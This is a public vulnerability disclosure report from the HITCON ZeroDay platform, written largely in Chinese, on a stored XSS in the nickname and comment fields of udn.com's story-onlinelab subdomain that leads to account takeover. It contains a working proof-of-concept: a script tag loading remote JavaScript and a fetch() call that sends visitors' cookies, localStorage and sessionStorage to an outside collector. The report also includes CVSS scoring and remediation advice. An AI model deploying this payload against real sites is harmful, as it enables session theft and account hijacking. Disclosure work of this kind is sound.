Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2025-01475
- 發信 Vendor: 聯合報
- Title: 聯合報 Account Takeover Via Subdomain Stored XSS (3)
- Introduction: 暱稱 / 留言 Stored XSS
處理狀態
目前狀態
公開
Last Update : 2026/01/14
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2025/12/10 10:20:08 : 新提交 (由 yusheng 更新此狀態)
- 2025/12/10 10:20:42 : 新提交 (由 yusheng 更新此狀態)
- 2025/12/11 16:33:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/05 11:52:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/05 11:52:25 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/05 11:52:25 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/01/06 14:44:04 : 已修補 (由 組織帳號 更新此狀態)
- 2026/01/14 03:00:18 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2025-01475
- 通報者:cat1528985 (yusheng)
- 風險:高
- 類型:預存式跨站腳本攻擊 (Stored Cross-Site Scripting)
參考資料
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS 防禦繞過方式:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
story-onlinelab.udn.com
敘述
PoC
- 登入 udn.com 會員
- 透過 story-onlinelab.udn.com 修改會員暱稱為
<script src="//lihi.cc/yhp3P"></script>這個 JS 會提取使用者的 url, cookie, localStorage, sessionStorage
fetch('https://blind-xss-collector.vercel.app/api/log', { method: 'post', mode: 'no-cors', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ url: location.href, cookie: document.cookie, localStorage: {...localStorage}, sessionStorage: {...sessionStorage} }) }) - 評論功能也可以注入 <script>,為了與暱稱區分,加上 ?from=comment
- 觀察到 "暱稱" 跟 "評論內容" 都成功注入 <script>
- 承上,使用瀏覽器的 Network 查看,確定 JS 有成功載入
影響
- 使用者在登入情況瀏覽評論,就會載入惡意 JS,竊取使用者的 cookie,且由於 udn.com 的 cookie 都是 httpOnly = false,故可以透過 JS 存取,達到帳號接管(Account Takeover)
- 承上,驗證從另一個 subdomain (vip.udn.com) 登入會員,確認 cookie 是寫入 udn.com
- udn.com 底下有數百個 subdomain,竊取 udn.com 的 cookie,可對其他 subdomain 進行 CSRF 攻擊(EX:修改會員資料 / 自動續訂 / 發文 / 留言)
- 背景載入挖礦程式
建議修補方式
- 暱稱以及評論渲染到 DOM 之前,需進行 HTMLEncode & Dompurify
- 從源頭(修改暱稱 & 新增評論),禁止輸入 HTML
- HTTP Response Header 設定 Content-Security-Policy
責任聲明
✓ 所有測試均在本人擁有的帳號間進行
✓ 未存取任何第三方使用者資料
✓ 未對系統造成實際損害
✓ 依循 Responsible Disclosure 原則通報
✓ 於 story-onlinelab.udn.com 測試的評論皆已刪除,無其他使用者受影響
漏洞嚴重度
等級: High / Critical
CVSS 3.1 評分: 8.7 (High)
評分向量: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
評分說明:
- AV:N (Attack Vector: Network) - 可遠端攻擊
- AC:L (Attack Complexity: Low) - 攻擊簡單
- PR:L (Privileges Required: Low) - 僅需註冊帳號
- UI:R (User Interaction Required) - 需受害者瀏覽文章
- S:C (Scope: Changed) - 跨使用者影響
- C:H (Confidentiality: High) - 完整竊取 session
- I:H (Integrity: High) - 可執行任意操作
- A:N (Availability: None) - 無直接可用性影響
備註
已於 2025/12/03 通報給聯合報主管,確保聯合報可以在第一時間盡快修正此漏洞
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。